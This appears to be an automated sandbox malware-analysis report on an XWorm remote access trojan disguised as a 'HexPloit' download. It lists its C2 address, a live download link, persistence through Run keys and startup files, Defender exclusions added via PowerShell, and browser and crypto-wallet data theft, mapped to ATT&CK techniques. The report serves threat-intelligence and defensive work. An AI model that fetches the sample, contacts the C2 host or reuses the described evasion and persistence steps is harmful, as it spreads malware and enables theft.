xworm | hxxps://gofile[.]io/d/cGWbix

Analysis

max time kernel
810s
max time network
806s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
29-06-2024 18:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/cGWbix

Score

10^/10

xworm discovery execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

91.92.241.69:5555

Attributes

Install_directory
%ProgramData%
install_file
PhoneLink.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\PhoneLink.exe family_xworm
behavioral2/memory/1036-1380-0x0000000000700000-0x000000000071A000-memory.dmp family_xworm
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1412 powershell.exe
6012 powershell.exe
5548 powershell.exe
4796 powershell.exe
4528 powershell.exe
5288 powershell.exe
4444 powershell.exe
5548 powershell.exe
Downloads MZ/PE file

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\PhoneLink.exe	family_xworm
behavioral2/memory/1036-1380-0x0000000000700000-0x000000000071A000-memory.dmp	family_xworm

pid	process
1412	powershell.exe
6012	powershell.exe
5548	powershell.exe
4796	powershell.exe
4528	powershell.exe
5288	powershell.exe
4444	powershell.exe
5548	powershell.exe

Drops startup file 4 IoCs

Processes:

PhoneLink.exesvchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PhoneLink.lnk	PhoneLink.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PhoneLink.lnk	PhoneLink.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe	svchost.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 21 IoCs

Processes:

7z2407-x64.exehexer.exehexer.exewinlogin.exeSystem32.exeHexPloit.exePhoneLink.exehexer.exenexusloader.exesvchost.exesvchost.exesvchost.exePhoneLink.exe

pid	process
2832	7z2407-x64.exe
2900	hexer.exe
5636	hexer.exe
4336	winlogin.exe
984	System32.exe
5376	HexPloit.exe
1036	PhoneLink.exe
2980	hexer.exe
4592	nexusloader.exe
5188	svchost.exe
2736	svchost.exe
1304	svchost.exe
5036	PhoneLink.exe
860
4336
5276
5684
2504
5220
4668
3088

Loads dropped DLL 64 IoCs

Processes:

hexer.exehexer.exenexusloader.exesvchost.exe

pid	process
3312
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
5636	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
2980	hexer.exe
4592	nexusloader.exe
4592	nexusloader.exe
4592	nexusloader.exe
4592	nexusloader.exe
4592	nexusloader.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

PhoneLink.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoneLink = "C:\\ProgramData\\PhoneLink.exe"	PhoneLink.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

126 ip-api.com
139 api.ipify.org
140 api.ipify.org
141 ipinfo.io
142 ipinfo.io

flow	ioc
126	ip-api.com
139	api.ipify.org
140	api.ipify.org
141	ipinfo.io
142	ipinfo.io

Drops file in Program Files directory 64 IoCs

Processes:

7z2407-x64.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz-cyrl.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\License.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\es.txt	7z2407-x64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5988
1656
4160
4888
860
4812
3996
2816	taskkill.exe
468	taskkill.exe
3868
3472
2728
5812
5520
2464	taskkill.exe
4268
1560
5768
5836
3056
2788
3464
5508
1556
2284
5156	taskkill.exe
2164
5628
1916
3020
6016
5288
3940	taskkill.exe
1032	taskkill.exe
2272
1192
2964
5620
5388
5624
4812
6024
3712
5904
5256
2376
4228
4056	taskkill.exe
1632
4844
6020
3048	taskkill.exe
1932
3912
3636
3256
1984
6132
5780
4968
712
1008
2348
1676

Modifies registry class 23 IoCs

Processes:

7z2407-x64.exemsedge.exeOpenWith.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2407-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1276817940-128734381-631578427-1000\{5756D14D-0FBA-472B-8C37-398149D672FA}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe

NTFS ADS 6 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\HexPloit Release (1).rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\HexPloit Release (2).rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\files.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\HexPloit Release.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 149947.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

460 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

vlc.exePhoneLink.exe

pid process

1336 vlc.exe
1036 PhoneLink.exe

pid	process
460	schtasks.exe

pid	process
1336	vlc.exe
1036	PhoneLink.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exe

pid	process
3352	msedge.exe
3352	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
1852	msedge.exe
1852	msedge.exe
428	identity_helper.exe
428	identity_helper.exe
4064	msedge.exe
4064	msedge.exe
2812	msedge.exe
2812	msedge.exe
244	msedge.exe
244	msedge.exe
3076	msedge.exe
3076	msedge.exe
2792	msedge.exe
2792	msedge.exe
388	msedge.exe
388	msedge.exe
388	msedge.exe
388	msedge.exe
4772	msedge.exe
4772	msedge.exe
5632	msedge.exe
5632	msedge.exe
2984	msedge.exe
2984	msedge.exe
5288	powershell.exe
5288	powershell.exe
5288	powershell.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
4796	powershell.exe
4796	powershell.exe
4796	powershell.exe
4528	powershell.exe
4528	powershell.exe
4528	powershell.exe
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe
6012	powershell.exe
6012	powershell.exe
6012	powershell.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
2736	svchost.exe
5548	powershell.exe
5548	powershell.exe
5548	powershell.exe
2736	svchost.exe
2736	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid process

1336 vlc.exe

pid	process
1336	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs

Processes:

msedge.exe

pid	process
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exePhoneLink.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exesvchost.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	5288	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	1036	PhoneLink.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	6012	powershell.exe
Token: SeDebugPrivilege	1036	PhoneLink.exe
Token: SeDebugPrivilege	2736	svchost.exe
Token: SeDebugPrivilege	1304	svchost.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	5548	powershell.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	5272	taskkill.exe
Token: SeDebugPrivilege	5168	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	460	taskkill.exe
Token: SeDebugPrivilege	5252	taskkill.exe
Token: SeDebugPrivilege	5884	taskkill.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	2896	taskkill.exe
Token: SeDebugPrivilege	6100	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	2240	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	1632	taskkill.exe
Token: SeDebugPrivilege	5548	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	5168	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	5872	taskkill.exe
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeDebugPrivilege	5520	taskkill.exe
Token: SeDebugPrivilege	5416	taskkill.exe
Token: SeDebugPrivilege	2344	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	5084	taskkill.exe
Token: SeDebugPrivilege	4212	taskkill.exe
Token: SeDebugPrivilege	2240	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	5396	taskkill.exe
Token: SeDebugPrivilege	5784	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	5724	taskkill.exe
Token: SeDebugPrivilege	5804	taskkill.exe
Token: SeDebugPrivilege	5272	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	5392	taskkill.exe
Token: SeDebugPrivilege	5252	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	6080	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	6084	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exevlc.exe

pid	process
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
1336	vlc.exe
1336	vlc.exe
1336	vlc.exe
1336	vlc.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe

Suspicious use of SendNotifyMessage 23 IoCs

Processes:

msedge.exevlc.exe

pid	process
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
1336	vlc.exe
1336	vlc.exe
1336	vlc.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

7z2407-x64.exeOpenWith.exevlc.exenexusloader.exe

pid process

2832 7z2407-x64.exe
3284 OpenWith.exe
3284 OpenWith.exe
3284 OpenWith.exe
1336 vlc.exe
4592 nexusloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3164 wrote to memory of 1832	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 1832	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3572	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3352	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 3352	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
PID 3164 wrote to memory of 4544	3164	msedge.exe	msedge.exe
